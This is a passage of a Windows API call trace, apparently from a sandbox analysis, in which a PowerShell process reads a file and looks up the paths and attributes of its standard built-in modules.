	[0049.034] ReadFile (in: hFile=0x5c0, lpBuffer=0x150476d2f5c, nNumberOfBytesToRead=0x9, lpNumberOfBytesRead=0x184c18d5a8, lpOverlapped=0x0 | out: lpBuffer=0x150476d2f5c*, lpNumberOfBytesRead=0x184c18d5a8*=0x9, lpOverlapped=0x0) returned 1
	[0049.034] ReadFile (in: hFile=0x5c0, lpBuffer=0x1504768b280, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d648, lpOverlapped=0x0 | out: lpBuffer=0x1504768b280*, lpNumberOfBytesRead=0x184c18d648*=0x1000, lpOverlapped=0x0) returned 1
	[0049.034] ReadFile (in: hFile=0x5c0, lpBuffer=0x150476d2f94, nNumberOfBytesToRead=0xb, lpNumberOfBytesRead=0x184c18d798, lpOverlapped=0x0 | out: lpBuffer=0x150476d2f94*, lpNumberOfBytesRead=0x184c18d798*=0xb, lpOverlapped=0x0) returned 1
	[0049.034] ReadFile (in: hFile=0x5c0, lpBuffer=0x1504768b280, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d798, lpOverlapped=0x0 | out: lpBuffer=0x1504768b280*, lpNumberOfBytesRead=0x184c18d798*=0x1000, lpOverlapped=0x0) returned 1
	[0049.034] ReadFile (in: hFile=0x5c0, lpBuffer=0x1504768b280, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d6a8, lpOverlapped=0x0 | out: lpBuffer=0x1504768b280*, lpNumberOfBytesRead=0x184c18d6a8*=0xd9b, lpOverlapped=0x0) returned 1
	[0049.035] ReadFile (in: hFile=0x5c0, lpBuffer=0x1504768b280, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18daf8, lpOverlapped=0x0 | out: lpBuffer=0x1504768b280*, lpNumberOfBytesRead=0x184c18daf8*=0x0, lpOverlapped=0x0) returned 1
	[0049.036] CloseHandle (hObject=0x5c0) returned 1
	[0049.036] CoTaskMemAlloc (cb=0x218) returned 0x1505fbc0e80
	[0049.036] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoloadingCacheMaintenance", lpBuffer=0x1505fbc0e80, nSize=0x10a | out: lpBuffer="\xf8d0\xf893\x7ffb") returned 0x0
	[0049.036] CoTaskMemFree (pv=0x1505fbc0e80) 
	[0049.039] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbc0e80
	[0049.039] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbc0e80 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0049.039] CoTaskMemFree (pv=0x1505fbc0e80) 
	[0049.040] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0049.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psm1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psm1", lpFilePart=0x0) returned 0x3f
	[0049.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.040] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\ise.psm1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474)) returned 1
	[0049.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0049.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.041] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1
	[0049.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0049.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.041] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1
	[0049.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.041] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b
	[0049.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.041] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8)) returned 1
	[0049.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.041] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psm1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psm1", lpFilePart=0x0) returned 0x43
	[0049.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.042] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psm1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de)) returned 1
	[0049.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.044] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43
	[0049.044] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.044] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1
	[0049.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.044] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", lpFilePart=0x0) returned 0x4e
	[0049.044] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.044] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3)) returned 1
	[0049.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.045] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53
	[0049.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.045] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4)) returned 1
	[0049.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.045] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadLine.psm1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadLine.psm1", lpFilePart=0x0) returned 0x49
	[0049.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.045] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psm1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4)) returned 1
	[0049.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.046] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49
	[0049.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.046] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1)) returned 1
	[0049.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73
	[0049.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.046] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296)) returned 1
	[0049.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", lpFilePart=0x0) returned 0x7c
	[0049.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.047] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautilshelper.ps1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c)) returned 1
	[0049.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", lpFilePart=0x0) returned 0x77
	[0049.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.047] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psm1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8)) returned 1
	[0049.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77
	[0049.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.047] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194)) returned 1
	[0049.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0049.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.047] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1
	[0049.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", lpFilePart=0x0) returned 0x6b
	[0049.048] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.048] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\microsoft.powershell.host.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4)) returned 1
	[0049.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", lpFilePart=0x0) returned 0x79
	[0049.048] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.048] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\microsoft.powershell.diagnostics.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256)) returned 1
	[0049.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", lpFilePart=0x0) returned 0x71
	[0049.048] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.048] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\microsoft.powershell.archive.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c)) returned 1
	[0049.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", lpFilePart=0x0) returned 0x5b
	[0049.048] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
